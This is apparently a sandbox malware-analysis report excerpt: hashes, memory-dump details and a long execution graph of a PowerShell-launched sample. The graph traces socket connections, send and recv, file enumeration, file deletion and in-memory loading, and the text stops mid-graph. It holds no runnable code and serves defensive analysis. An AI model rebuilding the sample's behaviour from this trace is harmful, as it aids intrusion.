                                                                                                                            • Instruction Fuzzy Hash: 02E12635704204DFCF2A9B68D8547AEBBF6AF81310F198476E9459B292DB70CD81CB91
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.380146591.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_390000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: H;*$L4p$L4p$L4p$l;*$l;*$l;*
                                                                                                                            • API String ID: 0-439555768
                                                                                                                            • Opcode ID: 07086dceb6a4ef305c1f361fc468b1566dd6c30375b7c1cadac780fc555a33a5
                                                                                                                            • Instruction ID: b423729cbecdd019199e7980c1e559c51cb1b50ed815bf40add8a7bade59c863
                                                                                                                            • Opcode Fuzzy Hash: 07086dceb6a4ef305c1f361fc468b1566dd6c30375b7c1cadac780fc555a33a5
                                                                                                                            • Instruction Fuzzy Hash: 366126357002489FCF1A9F68C81076EBBB6EFC1320F15887AE9558B292DB70DD51CBA1

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:6.6%
                                                                                                                            Dynamic/Decrypted Code Coverage:14.9%
                                                                                                                            Signature Coverage:5%
                                                                                                                            Total number of Nodes:2000
                                                                                                                            Total number of Limit Nodes:75
                                                                                                                            execution_graph 52977 10006d60 52978 10006d69 52977->52978 52979 10006d72 52977->52979 52981 10006c5f 52978->52981 53001 10005af6 GetLastError 52981->53001 52983 10006c6c 53021 10006d7e 52983->53021 52985 10006c74 53030 100069f3 52985->53030 52988 10006c8b 52988->52979 52991 10006cce 53055 1000571e 19 API calls _free 52991->53055 52995 10006cc9 53054 10006368 19 API calls __dosmaperr 52995->53054 52997 10006d12 52997->52991 53057 100068c9 25 API calls 52997->53057 52998 10006ce6 52998->52997 53056 1000571e 19 API calls _free 52998->53056 53002 10005b12 53001->53002 53003 10005b0c 53001->53003 53007 10005b61 SetLastError 53002->53007 53059 1000637b 19 API calls 2 library calls 53002->53059 53058 10005e08 10 API calls 2 library calls 53003->53058 53006 10005b24 53011 10005b2c 53006->53011 53061 10005e5e 10 API calls 2 library calls 53006->53061 53007->52983 53009 10005b41 53009->53011 53012 10005b48 53009->53012 53060 1000571e 19 API calls _free 53011->53060 53062 1000593c 19 API calls __dosmaperr 53012->53062 53013 10005b32 53015 10005b6d SetLastError 53013->53015 53064 100055a8 36 API calls _abort 53015->53064 53016 10005b53 53063 1000571e 19 API calls _free 53016->53063 53020 10005b5a 53020->53007 53020->53015 53022 10006d8a ___DestructExceptionObject 53021->53022 53023 10005af6 _abort 36 API calls 53022->53023 53024 10006d94 53023->53024 53027 10006e18 _abort 53024->53027 53065 100055a8 36 API calls _abort 53024->53065 53066 10005671 RtlEnterCriticalSection 53024->53066 53067 1000571e 19 API calls _free 53024->53067 53068 10006e0f RtlLeaveCriticalSection _abort 53024->53068 53027->52985 53069 100054a7 53030->53069 53033 10006a14 GetOEMCP 53035 10006a3d 53033->53035 53034 10006a26 53034->53035 53036 10006a2b GetACP 53034->53036 53035->52988 53037 100056d0 53035->53037 53036->53035 53038 1000570e 53037->53038 53042 100056de __dosmaperr 53037->53042 53080 10006368 19 API calls __dosmaperr 53038->53080 53039 100056f9 RtlAllocateHeap 53041 1000570c 53039->53041 53039->53042 53041->52991 53044 10006e20 53041->53044 53042->53038 53042->53039 53079 1000474f 7 API calls 2 library calls 53042->53079 53045 100069f3 38 API calls 53044->53045 53047 10006e3f 53045->53047 53046 10006e46 53091 10002ada 53046->53091 53047->53046 53050 10006e90 IsValidCodePage 53047->53050 53053 10006eb5 ___scrt_fastfail 53047->53053 53049 10006cc1 53049->52995 53049->52998 53050->53046 53051 10006ea2 GetCPInfo 53050->53051 53051->53046 53051->53053 53081 10006acb GetCPInfo 53053->53081 53054->52991 53055->52988 53056->52997 53057->52991 53058->53002 53059->53006 53060->53013 53061->53009 53062->53016 53063->53020 53066->53024 53067->53024 53068->53024 53070 100054c4 53069->53070 53071 100054ba 53069->53071 53070->53071 53072 10005af6 _abort 36 API calls 53070->53072 53071->53033 53071->53034 53073 100054e5 53072->53073 53077 10007a00 36 API calls __fassign 53073->53077 53075 100054fe 53078 10007a2d 36 API calls __fassign 53075->53078 53077->53075 53078->53071 53079->53042 53080->53041 53082 10006baf 53081->53082 53083 10006b05 53081->53083 53086 10002ada _ValidateLocalCookies 5 API calls 53082->53086 53098 100086e4 53083->53098 53088 10006c5b 53086->53088 53088->53046 53090 10008a3e 41 API calls 53090->53082 53092 10002ae3 53091->53092 53093 10002ae5 IsProcessorFeaturePresent 53091->53093 53092->53049 53095 10002b58 53093->53095 53168 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53095->53168 53097 10002c3b 53097->53049 53099 100054a7 __fassign 36 API calls 53098->53099 53100 10008704 MultiByteToWideChar 53099->53100 53102 10008742 53100->53102 53103 100087da 53100->53103 53105 100056d0 20 API calls 53102->53105 53108 10008763 ___scrt_fastfail 53102->53108 53104 10002ada _ValidateLocalCookies 5 API calls 53103->53104 53106 10006b66 53104->53106 53105->53108 53112 10008a3e 53106->53112 53107 100087d4 53117 10008801 19 API calls _free 53107->53117 53108->53107 53110 100087a8 MultiByteToWideChar 53108->53110 53110->53107 53111 100087c4 GetStringTypeW 53110->53111 53111->53107 53113 100054a7 __fassign 36 API calls 53112->53113 53114 10008a51 53113->53114 53118 10008821 53114->53118 53117->53103 53119 1000883c 53118->53119 53120 10008862 MultiByteToWideChar 53119->53120 53121 10008a16 53120->53121 53122 1000888c 53120->53122 53123 10002ada _ValidateLocalCookies 5 API calls 53121->53123 53125 100056d0 20 API calls 53122->53125 53128 100088ad 53122->53128 53124 10006b87 53123->53124 53124->53090 53125->53128 53126 100088f6 MultiByteToWideChar 53127 10008962 53126->53127 53129 1000890f 53126->53129 53154 10008801 19 API calls _free 53127->53154 53128->53126 53128->53127 53145 10005f19 53129->53145 53133 10008971 53135 100056d0 20 API calls 53133->53135 53139 10008992 53133->53139 53134 10008939 53134->53127 53137 10005f19 10 API calls 53134->53137 53135->53139 53136 10008a07 53153 10008801 19 API calls _free 53136->53153 53137->53127 53139->53136 53140 10005f19 10 API calls 53139->53140 53141 100089e6 53140->53141 53141->53136 53142 100089f5 WideCharToMultiByte 53141->53142 53142->53136 53143 10008a35 53142->53143 53155 10008801 19 API calls _free 53143->53155 53156 10005c45 53145->53156 53147 10005f40 53150 10005f49 53147->53150 53160 10005fa1 9 API calls 2 library calls 53147->53160 53149 10005f89 LCMapStringW 53149->53150 53151 10002ada _ValidateLocalCookies 5 API calls 53150->53151 53152 10005f9b 53151->53152 53152->53127 53152->53133 53152->53134 53153->53127 53154->53121 53155->53127 53157 10005c75 __crt_fast_encode_pointer 53156->53157 53159 10005c71 53156->53159 53157->53147 53159->53157 53161 10005ce1 53159->53161 53160->53149 53162 10005d02 LoadLibraryExW 53161->53162 53166 10005cf7 53161->53166 53163 10005d37 53162->53163 53164 10005d1f GetLastError 53162->53164 53163->53166 53167 10005d4e FreeLibrary 53163->53167 53164->53163 53165 10005d2a LoadLibraryExW 53164->53165 53165->53163 53166->53159 53167->53166 53168->53097 53169 4165a0 53180 401e65 53169->53180 53171 4165b0 53185 4020f6 53171->53185 53174 401e65 22 API calls 53175 4165c6 53174->53175 53176 4020f6 28 API calls 53175->53176 53177 4165d1 53176->53177 53191 41292a 53177->53191 53181 401e6d 53180->53181 53183 401e75 53181->53183 53210 402158 22 API calls 53181->53210 53183->53171 53186 40210c 53185->53186 53211 4023ce 53186->53211 53188 402126 53215 402569 53188->53215 53190 402134 53190->53174 53263 40482d 53191->53263 53193 41293e 53270 4048c8 connect 53193->53270 53197 41295f 53335 402f10 53197->53335 53206 401fd8 11 API calls 53207 412991 53206->53207 53208 401fd8 11 API calls 53207->53208 53209 412999 53208->53209 53212 402428 53211->53212 53213 4023d8 53211->53213 53212->53188 53213->53212 53225 4027a7 53213->53225 53236 402888 53215->53236 53217 40257d 53218 402592 53217->53218 53219 4025a7 53217->53219 53241 402a34 22 API calls 53218->53241 53243 4028e8 53219->53243 53222 40259b 53242 4029da 22 API calls 53222->53242 53224 4025a5 53224->53190 53226 402e21 53225->53226 53229 4016b4 53226->53229 53228 402e30 53228->53212 53230 4016cb 53229->53230 53231 4016c6 53229->53231 53230->53231 53232 4016f3 53230->53232 53235 43bd19 11 API calls _Atexit 53231->53235 53232->53228 53234 43bd18 53235->53234 53237 402890 53236->53237 53238 402898 53237->53238 53254 402ca3 22 API calls 53237->53254 53238->53217 53241->53222 53242->53224 53244 4028f1 53243->53244 53245 402953 53244->53245 53246 4028fb 53244->53246 53261 4028a4 22 API calls 53245->53261 53249 402904 53246->53249 53251 402917 53246->53251 53255 402cae 53249->53255 53252 402915 53251->53252 53253 4023ce 11 API calls 53251->53253 53252->53224 53253->53252 53256 402cb8 __EH_prolog 53255->53256 53262 402e54 22 API calls 53256->53262 53258 4023ce 11 API calls 53260 402d92 53258->53260 53259 402d24 53259->53258 53260->53252 53262->53259 53264 404846 socket 53263->53264 53265 404839 53263->53265 53267 404860 CreateEventW 53264->53267 53268 404842 53264->53268 53376 40489e WSAStartup 53265->53376 53267->53193 53268->53193 53269 40483e 53269->53264 53269->53268 53271 404a1b 53270->53271 53272 4048ee 53270->53272 53273 404a21 WSAGetLastError 53271->53273 53323 40497e 53271->53323 53274 404923 53272->53274 53272->53323 53377 40531e 53272->53377 53275 404a31 53273->53275 53273->53323 53412 420c60 27 API calls 53274->53412 53276 404932 53275->53276 53277 404a36 53275->53277 53286 402093 28 API calls 53276->53286 53417 41cae1 30 API calls 53277->53417 53281 40492b 53281->53276 53285 404941 53281->53285 53282 40490f 53382 402093 53282->53382 53284 404a40 53418 4052fd 28 API calls 53284->53418 53295 404950 53285->53295 53296 404987 53285->53296 53289 404a80 53286->53289 53292 402093 28 API calls 53289->53292 53293 404a8f 53292->53293 53297 41b4ef 80 API calls 53293->53297 53300 402093 28 API calls 53295->53300 53414 421a40 54 API calls 53296->53414 53297->53323 53303 40495f 53300->53303 53302 40498f 53305 4049c4 53302->53305 53306 404994 53302->53306 53307 402093 28 API calls 53303->53307 53416 420e06 28 API calls 53305->53416 53310 402093 28 API calls 53306->53310 53311 40496e 53307->53311 53313 4049a3 53310->53313 53312 41b4ef 80 API calls 53311->53312 53314 404973 53312->53314 53317 402093 28 API calls 53313->53317 53413 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53314->53413 53315 4049cc 53316 4049f9 CreateEventW CreateEventW 53315->53316 53318 402093 28 API calls 53315->53318 53316->53323 53319 4049b2 53317->53319 53321 4049e2 53318->53321 53322 41b4ef 80 API calls 53319->53322 53324 402093 28 API calls 53321->53324 53325 4049b7 53322->53325 53330 402f31 53323->53330 53326 4049f1 53324->53326 53415 4210b2 52 API calls 53325->53415 53328 41b4ef 80 API calls 53326->53328 53329 4049f6 53328->53329 53329->53316 53331 4020df 11 API calls 53330->53331 53332 402f3d 53331->53332 53333 4032a0 28 API calls 53332->53333 53334 402f59 53333->53334 53334->53197 53480 401fb0 53335->53480 53337 402f1e 53338 402055 11 API calls 53337->53338 53339 402f2d 53338->53339 53340 404aa1 53339->53340 53341 404ab4 53340->53341 53483 40520c 53341->53483 53343 404ac9 _Yarn 53344 404b40 WaitForSingleObject 53343->53344 53345 404b20 53343->53345 53347 404b56 53344->53347 53346 404b32 send 53345->53346 53348 404b7b 53346->53348 53489 42103a 54 API calls 53347->53489 53351 401fd8 11 API calls 53348->53351 53350 404b69 SetEvent 53350->53348 53352 404b83 53351->53352 53353 401fd8 11 API calls 53352->53353 53354 404b8b 53353->53354 53355 401fd8 53354->53355 53356 4023ce 11 API calls 53355->53356 53357 401fe1 53356->53357 53358 404c10 53357->53358 53359 4020df 11 API calls 53358->53359 53360 404c27 53359->53360 53361 4020df 11 API calls 53360->53361 53364 404c30 53361->53364 53366 404ca1 53364->53366 53370 401fd8 11 API calls 53364->53370 53507 43bd51 53364->53507 53514 404b96 53364->53514 53520 4020b7 53364->53520 53526 401fe2 53364->53526 53535 404cc3 53364->53535 53548 404e26 WaitForSingleObject 53366->53548 53370->53364 53371 401fd8 11 API calls 53372 404cb1 53371->53372 53373 401fd8 11 API calls 53372->53373 53374 404cba 53373->53374 53374->53206 53376->53269 53419 4020df 53377->53419 53379 40532a 53423 4032a0 53379->53423 53381 405346 53381->53282 53383 40209b 53382->53383 53384 4023ce 11 API calls 53383->53384 53385 4020a6 53384->53385 53427 4024ed 53385->53427 53388 41b4ef 53389 41b5a0 53388->53389 53390 41b505 GetLocalTime 53388->53390 53391 401fd8 11 API calls 53389->53391 53392 40531e 28 API calls 53390->53392 53393 41b5a8 53391->53393 53394 41b547 53392->53394 53396 401fd8 11 API calls 53393->53396 53438 406383 53394->53438 53398 41b5b0 53396->53398 53398->53274 53399 402f10 28 API calls 53400 41b55f 53399->53400 53401 406383 28 API calls 53400->53401 53402 41b56b 53401->53402 53443 407200 77 API calls 53402->53443 53404 41b579 53405 401fd8 11 API calls 53404->53405 53406 41b585 53405->53406 53407 401fd8 11 API calls 53406->53407 53408 41b58e 53407->53408 53409 401fd8 11 API calls 53408->53409 53410 41b597 53409->53410 53411 401fd8 11 API calls 53410->53411 53411->53389 53412->53281 53413->53323 53414->53302 53415->53314 53416->53315 53417->53284 53420 4020e7 53419->53420 53421 4023ce 11 API calls 53420->53421 53422 4020f2 53421->53422 53422->53379 53425 4032aa 53423->53425 53424 4032c9 53424->53381 53425->53424 53426 4028e8 28 API calls 53425->53426 53426->53424 53428 4024f9 53427->53428 53431 40250a 53428->53431 53430 4020b1 53430->53388 53432 40251a 53431->53432 53433 402520 53432->53433 53434 402535 53432->53434 53436 402569 28 API calls 53433->53436 53435 4028e8 28 API calls 53434->53435 53437 402533 53435->53437 53436->53437 53437->53430 53444 4051ef 53438->53444 53440 406391 53448 402055 53440->53448 53443->53404 53445 4051fb 53444->53445 53454 405274 53445->53454 53447 405208 53447->53440 53449 402061 53448->53449 53450 4023ce 11 API calls 53449->53450 53451 40207b 53450->53451 53476 40267a 53451->53476 53455 405282 53454->53455 53456 405288 53455->53456 53457 40529e 53455->53457 53465 4025f0 53456->53465 53459 4052f5 53457->53459 53460 4052b6 53457->53460 53474 4028a4 22 API calls 53459->53474 53463 4028e8 28 API calls 53460->53463 53464 40529c 53460->53464 53463->53464 53464->53447 53466 402888 22 API calls 53465->53466 53467 402602 53466->53467 53468 402672 53467->53468 53469 402629 53467->53469 53475 4028a4 22 API calls 53468->53475 53472 4028e8 28 API calls 53469->53472 53473 40263b 53469->53473 53472->53473 53473->53464 53477 40268b 53476->53477 53478 4023ce 11 API calls 53477->53478 53479 40208d 53478->53479 53479->53399 53481 4025f0 28 API calls 53480->53481 53482 401fbd 53481->53482 53482->53337 53484 405214 53483->53484 53485 4023ce 11 API calls 53484->53485 53486 40521f 53485->53486 53490 405234 53486->53490 53488 40522e 53488->53343 53489->53350 53491 405240 53490->53491 53492 40526e 53490->53492 53493 4028e8 28 API calls 53491->53493 53506 4028a4 22 API calls 53492->53506 53496 40524a 53493->53496 53496->53488 53512 446137 ___crtLCMapStringA 53507->53512 53508 446175 53562 4405dd 20 API calls _free 53508->53562 53510 446160 RtlAllocateHeap 53511 446173 53510->53511 53510->53512 53511->53364 53512->53508 53512->53510 53561 442f80 7 API calls 2 library calls 53512->53561 53515 404ba0 WaitForSingleObject 53514->53515 53516 404bcd recv 53514->53516 53563 421076 54 API calls 53515->53563 53518 404be0 53516->53518 53518->53364 53519 404bbc SetEvent 53519->53518 53521 4020bf 53520->53521 53522 4023ce 11 API calls 53521->53522 53523 4020ca 53522->53523 53524 40250a 28 API calls 53523->53524 53525 4020d9 53524->53525 53525->53364 53527 401ff1 53526->53527 53534 402039 53526->53534 53528 4023ce 11 API calls 53527->53528 53529 401ffa 53528->53529 53530 40203c 53529->53530 53532 402015 53529->53532 53531 40267a 11 API calls 53530->53531 53531->53534 53564 403098 28 API calls 53532->53564 53534->53364 53536 4020df 11 API calls 53535->53536 53546 404cde 53536->53546 53537 404e13 53538 401fd8 11 API calls 53537->53538 53539 404e1c 53538->53539 53539->53364 53540 4041a2 28 API calls 53540->53546 53541 401fe2 28 API calls 53541->53546 53542 401fd8 11 API calls 53542->53546 53543 4020f6 28 API calls 53543->53546 53546->53537 53546->53540 53546->53541 53546->53542 53546->53543 53565 41299f 53546->53565 53609 401fc0 53546->53609 53549 404e40 SetEvent CloseHandle 53548->53549 53550 404e57 closesocket 53548->53550 53551 404ca8 53549->53551 53552 404e64 53550->53552 53551->53371 53553 404e7a 53552->53553 54256 4050e4 84 API calls 53552->54256 53555 404e8c WaitForSingleObject 53553->53555 53556 404ece SetEvent CloseHandle 53553->53556 54257 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53555->54257 53556->53551 53558 404e9b SetEvent WaitForSingleObject 54258 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53558->54258 53560 404eb3 SetEvent CloseHandle CloseHandle 53560->53556 53561->53512 53562->53511 53563->53519 53564->53534 53566 4129b1 53565->53566 53613 4041a2 53566->53613 53569 4020f6 28 API calls 53570 4129d3 53569->53570 53571 4020f6 28 API calls 53570->53571 53572 4129e2 53571->53572 53616 41be1b 53572->53616 53574 412a93 53785 401e8d 53574->53785 53577 401e65 22 API calls 53579 412a02 53577->53579 53581 4020f6 28 API calls 53579->53581 53580 401fd8 11 API calls 53582 412aa5 53580->53582 53583 412a0d 53581->53583 53584 401fd8 11 API calls 53582->53584 53585 401e65 22 API calls 53583->53585 53586 412aad 53584->53586 53587 412a18 53585->53587 53586->53546 53588 4020f6 28 API calls 53587->53588 53589 412a23 53588->53589 53590 401e65 22 API calls 53589->53590 53591 412a2e 53590->53591 53592 4020f6 28 API calls 53591->53592 53593 412a39 53592->53593 53594 401e65 22 API calls 53593->53594 53595 412a44 53594->53595 53596 4020f6 28 API calls 53595->53596 53597 412a4f 53596->53597 53598 401e65 22 API calls 53597->53598 53599 412a5a 53598->53599 53600 4020f6 28 API calls 53599->53600 53601 412a65 53600->53601 53602 401e65 22 API calls 53601->53602 53603 412a73 53602->53603 53604 4020f6 28 API calls 53603->53604 53605 412a7e 53604->53605 53638 412ab4 GetModuleFileNameW 53605->53638 53608 404e26 99 API calls 53608->53574 53610 401fd2 CreateEventA CreateThread WaitForSingleObject CloseHandle 53609->53610 53611 401fc9 53609->53611 53610->53546 54070 415aea 53610->54070 54069 4025e0 28 API calls 53611->54069 53791 40423a 53613->53791 53617 4020df 11 API calls 53616->53617 53637 41be2e 53617->53637 53618 41be9e 53619 401fd8 11 API calls 53618->53619 53620 41bed0 53619->53620 53621 401fd8 11 API calls 53620->53621 53623 41bed8 53621->53623 53622 41bea0 53624 4041a2 28 API calls 53622->53624 53626 401fd8 11 API calls 53623->53626 53627 41beac 53624->53627 53625 4041a2 28 API calls 53625->53637 53629 4129eb 53626->53629 53630 401fe2 28 API calls 53627->53630 53628 401fe2 28 API calls 53628->53637 53629->53574 53629->53577 53631 41beb5 53630->53631 53632 401fd8 11 API calls 53631->53632 53634 41bebd 53632->53634 53633 401fd8 11 API calls 53633->53637 53635 41ce34 28 API calls 53634->53635 53635->53618 53637->53618 53637->53622 53637->53625 53637->53628 53637->53633 53797 41ce34 53637->53797 53639 4020df 11 API calls 53638->53639 53640 412adf 53639->53640 53641 4020df 11 API calls 53640->53641 53642 412aeb 53641->53642 53643 4020df 11 API calls 53642->53643 53665 412af7 53643->53665 53644 41b978 43 API calls 53644->53665 53645 40d9e8 32 API calls 53645->53665 53646 401fd8 11 API calls 53646->53665 53647 40417e 28 API calls 53647->53665 53648 4042fc 84 API calls 53648->53665 53649 40431d 28 API calls 53649->53665 53650 412c1d Sleep 53650->53665 53651 403014 28 API calls 53651->53665 53652 418568 31 API calls 53652->53665 53653 412cbf Sleep 53653->53665 53654 401f09 11 API calls 53654->53665 53655 412d61 Sleep 53655->53665 53656 412dc4 DeleteFileW 53656->53665 53657 41c485 32 API calls 53657->53665 53658 412dfb DeleteFileW 53658->53665 53659 412e4d Sleep 53659->53665 53660 412e37 DeleteFileW 53660->53665 53661 412ec6 53662 401f09 11 API calls 53661->53662 53663 412ed2 53662->53663 53664 401f09 11 API calls 53663->53664 53666 412ede 53664->53666 53665->53644 53665->53645 53665->53646 53665->53647 53665->53648 53665->53649 53665->53650 53665->53651 53665->53652 53665->53653 53665->53654 53665->53655 53665->53656 53665->53657 53665->53658 53665->53659 53665->53661 53669 412e92 Sleep 53665->53669 53672 412e26 53665->53672 53667 401f09 11 API calls 53666->53667 53668 412eea 53667->53668 53849 40b904 53668->53849 53867 401f09 53669->53867 53672->53660 53672->53665 53675 401f09 11 API calls 53672->53675 53678 412ec4 53672->53678 53673 412efd 53674 4020f6 28 API calls 53673->53674 53676 412f1d 53674->53676 53675->53672 53855 41322d 53676->53855 53678->53668 53680 401f09 11 API calls 53681 412f34 53680->53681 53682 412f54 53681->53682 53683 4130a8 53681->53683 53870 41bd1e 53682->53870 53684 41bd1e 28 API calls 53683->53684 53686 4130b1 53684->53686 53688 402f31 28 API calls 53686->53688 53690 4130e8 53688->53690 53692 402f10 28 API calls 53690->53692 53695 4130f7 53692->53695 53693 402f31 28 API calls 53694 412faa 53693->53694 53697 402f10 28 API calls 53694->53697 53696 402f10 28 API calls 53695->53696 53698 413103 53696->53698 53699 412fb9 53697->53699 53700 402f10 28 API calls 53698->53700 53701 402f10 28 API calls 53699->53701 53702 413112 53700->53702 53703 412fc8 53701->53703 53704 402f10 28 API calls 53702->53704 53705 402f10 28 API calls 53703->53705 53706 413121 53704->53706 53707 412fd7 53705->53707 53708 402f10 28 API calls 53706->53708 53709 402f10 28 API calls 53707->53709 53710 413130 53708->53710 53711 412fe6 53709->53711 53712 402f10 28 API calls 53710->53712 53713 402f10 28 API calls 53711->53713 53714 41313f 53712->53714 53715 412ff2 53713->53715 53881 402ea1 28 API calls 53714->53881 53717 402f10 28 API calls 53715->53717 53719 412ffe 53717->53719 53718 413149 53720 404aa1 61 API calls 53718->53720 53879 402ea1 28 API calls 53719->53879 53722 413156 53720->53722 53724 401fd8 11 API calls 53722->53724 53723 41300d 53725 402f10 28 API calls 53723->53725 53727 413162 53724->53727 53726 413019 53725->53726 53880 402ea1 28 API calls 53726->53880 53728 401fd8 11 API calls 53727->53728 53730 41316e 53728->53730 53732 401fd8 11 API calls 53730->53732 53731 413023 53733 404aa1 61 API calls 53731->53733 53734 41317a 53732->53734 53735 413030 53733->53735 53736 401fd8 11 API calls 53734->53736 53737 401fd8 11 API calls 53735->53737 53738 413186 53736->53738 53739 413039 53737->53739 53740 401fd8 11 API calls 53738->53740 53741 401fd8 11 API calls 53739->53741 53742 41318f 53740->53742 53743 413042 53741->53743 53744 401fd8 11 API calls 53742->53744 53745 401fd8 11 API calls 53743->53745 53746 413198 53744->53746 53747 41304b 53745->53747 53748 401fd8 11 API calls 53746->53748 53749 401fd8 11 API calls 53747->53749 53750 41309c 53748->53750 53751 413054 53749->53751 53753 401fd8 11 API calls 53750->53753 53752 401fd8 11 API calls 53751->53752 53754 413060 53752->53754 53755 4131aa 53753->53755 53756 401fd8 11 API calls 53754->53756 53758 401f09 11 API calls 53755->53758 53757 41306c 53756->53757 53760 401fd8 11 API calls 53757->53760 53759 4131b6 53758->53759 53761 401fd8 11 API calls 53759->53761 53762 413078 53760->53762 53763 4131c2 53761->53763 53764 401fd8 11 API calls 53762->53764 53765 401fd8 11 API calls 53763->53765 53766 413084 53764->53766 53767 4131ce 53765->53767 53768 401fd8 11 API calls 53766->53768 53769 401fd8 11 API calls 53767->53769 53770 413090 53768->53770 53771 4131da 53769->53771 53772 401fd8 11 API calls 53770->53772 53773 401fd8 11 API calls 53771->53773 53772->53750 53774 4131e6 53773->53774 53775 401fd8 11 API calls 53774->53775 53776 4131f2 53775->53776 53777 401fd8 11 API calls 53776->53777 53778 4131fe 53777->53778 53779 401fd8 11 API calls 53778->53779 53780 41320a 53779->53780 53781 401fd8 11 API calls 53780->53781 53782 413216 53781->53782 53783 401fd8 11 API calls 53782->53783 53784 412a83 53783->53784 53784->53608 53786 402163 53785->53786 53787 40219f 53786->53787 54067 402730 11 API calls 53786->54067 53787->53580 53789 402184 54068 402712 11 API calls std::_Deallocate 53789->54068 53792 404243 53791->53792 53793 4023ce 11 API calls 53792->53793 53794 40424e 53793->53794 53795 402569 28 API calls 53794->53795 53796 4041b5 53795->53796 53796->53569 53798 41ce41 53797->53798 53799 41ce51 53798->53799 53800 41cea0 53798->53800 53804 41ce89 53799->53804 53808 41cfe0 53799->53808 53801 41cfe0 28 API calls 53800->53801 53802 41ceba 53800->53802 53801->53802 53803 41d146 28 API calls 53802->53803 53805 41ce9c 53803->53805 53816 41d146 53804->53816 53805->53637 53810 41cfe8 53808->53810 53809 41d01a 53809->53804 53810->53809 53811 41d01e 53810->53811 53814 41d002 53810->53814 53830 402725 22 API calls 53811->53830 53820 41d051 53814->53820 53817 41d14f 53816->53817 53841 41d1f2 53817->53841 53821 41d05b __EH_prolog 53820->53821 53831 402717 22 API calls 53821->53831 53823 41d06e 53832 41d15d 53823->53832 53825 41d094 53826 41d0cc 53825->53826 53835 402730 11 API calls 53825->53835 53826->53809 53828 41d0b3 53836 402712 11 API calls std::_Deallocate 53828->53836 53831->53823 53837 41d203 53832->53837 53834 41d16f 53834->53825 53835->53828 53836->53826 53838 41d210 53837->53838 53839 41d2c7 11 API calls 53838->53839 53840 41d228 53839->53840 53840->53834 53842 41d1fb 53841->53842 53845 41d2a0 53842->53845 53846 41d2ab 53845->53846 53847 41d159 53846->53847 53848 4020f6 28 API calls 53846->53848 53847->53805 53848->53847 53850 40b90c 53849->53850 53882 402252 53850->53882 53852 40b917 53886 40b92c 53852->53886 53854 40b926 53854->53673 53856 41326b 53855->53856 53858 41323c 53855->53858 53857 41327a 53856->53857 53908 10001c5b 53856->53908 53916 40417e 53857->53916 53912 411cf2 53858->53912 53863 401fd8 11 API calls 53865 412f28 53863->53865 53865->53680 53868 402252 11 API calls 53867->53868 53869 401f12 53868->53869 53869->53672 53871 41bd2b 53870->53871 53872 4020b7 28 API calls 53871->53872 53873 412f60 53872->53873 53874 41bb8e 53873->53874 54058 441e81 53874->54058 53877 402093 28 API calls 53878 412f7a 53877->53878 53878->53693 53879->53723 53880->53731 53881->53718 53883 4022ac 53882->53883 53884 40225c 53882->53884 53883->53852 53884->53883 53893 402779 11 API calls std::_Deallocate 53884->53893 53887 40b966 53886->53887 53888 40b938 53886->53888 53905 4028a4 22 API calls 53887->53905 53894 4027e6 53888->53894 53892 40b942 53892->53854 53893->53883 53895 4027ef 53894->53895 53896 402851 53895->53896 53897 4027f9 53895->53897 53907 4028a4 22 API calls 53896->53907 53900 402802 53897->53900 53902 402815 53897->53902 53906 402aea 28 API calls __EH_prolog 53900->53906 53903 402813 53902->53903 53904 402252 11 API calls 53902->53904 53903->53892 53904->53903 53906->53903 53909 10001c6b ___scrt_fastfail 53908->53909 53922 100012ee 53909->53922 53911 10001c87 53911->53857 53964 411cfe 53912->53964 53915 411f67 22 API calls _Yarn 53915->53856 53917 404186 53916->53917 53918 402252 11 API calls 53917->53918 53919 404191 53918->53919 54037 4041bc 53919->54037 53923 10001324 ___scrt_fastfail 53922->53923 53924 100013b7 GetEnvironmentVariableW 53923->53924 53948 100010f1 53924->53948 53927 100010f1 51 API calls 53928 10001465 53927->53928 53929 100010f1 51 API calls 53928->53929 53930 10001479 53929->53930 53931 100010f1 51 API calls 53930->53931 53932 1000148d 53931->53932 53933 100010f1 51 API calls 53932->53933 53934 100014a1 53933->53934 53935 100010f1 51 API calls 53934->53935 53936 100014b5 lstrlenW 53935->53936 53937 100014d2 53936->53937 53938 100014d9 lstrlenW 53936->53938 53937->53911 53939 100010f1 51 API calls 53938->53939 53940 10001501 lstrlenW lstrcatW 53939->53940 53941 100010f1 51 API calls 53940->53941 53942 10001539 lstrlenW lstrcatW 53941->53942 53943 100010f1 51 API calls 53942->53943 53944 1000156b lstrlenW lstrcatW 53943->53944 53945 100010f1 51 API calls 53944->53945 53946 1000159d lstrlenW lstrcatW 53945->53946 53947 100010f1 51 API calls 53946->53947 53947->53937 53949 10001118 ___scrt_fastfail 53948->53949 53950 10001129 lstrlenW 53949->53950 53961 10002c40 53950->53961 53952 10001148 lstrcatW lstrlenW 53953 10001177 lstrlenW FindFirstFileW 53952->53953 53954 10001168 lstrlenW 53952->53954 53955 100011a0 53953->53955 53956 100011e1 53953->53956 53954->53953 53957 100011c7 FindNextFileW 53955->53957 53958 100011aa 53955->53958 53956->53927 53957->53955 53960 100011da FindClose 53957->53960 53958->53957 53963 10001000 51 API calls ___scrt_fastfail 53958->53963 53960->53956 53962 10002c57 53961->53962 53962->53952 53962->53962 53963->53958 53999 41179c 53964->53999 53966 411d1c 53967 411d32 SetLastError 53966->53967 53968 41179c SetLastError 53966->53968 53995 411cfa 53966->53995 53967->53995 53969 411d4f 53968->53969 53969->53967 53971 411d71 GetNativeSystemInfo 53969->53971 53969->53995 53972 411db7 53971->53972 53983 411dc4 SetLastError 53972->53983 54002 411ca3 VirtualAlloc 53972->54002 53975 411de7 53976 411e0c GetProcessHeap HeapAlloc 53975->53976 54028 411ca3 VirtualAlloc 53975->54028 53977 411e23 53976->53977 53978 411e35 53976->53978 54029 411cba VirtualFree 53977->54029 53981 41179c SetLastError 53978->53981 53984 411e7e 53981->53984 53982 411dff 53982->53976 53982->53983 53983->53995 53985 411f30 53984->53985 54003 411ca3 VirtualAlloc 53984->54003 54030 412077 GetProcessHeap HeapFree 53985->54030 53988 